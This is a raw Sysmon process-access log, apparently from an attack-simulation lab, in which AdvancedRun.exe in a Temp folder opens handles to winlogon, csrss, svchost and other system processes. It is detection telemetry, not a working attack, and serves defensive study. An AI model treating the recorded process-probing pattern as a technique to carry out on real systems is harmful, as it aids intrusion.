18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004008599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\A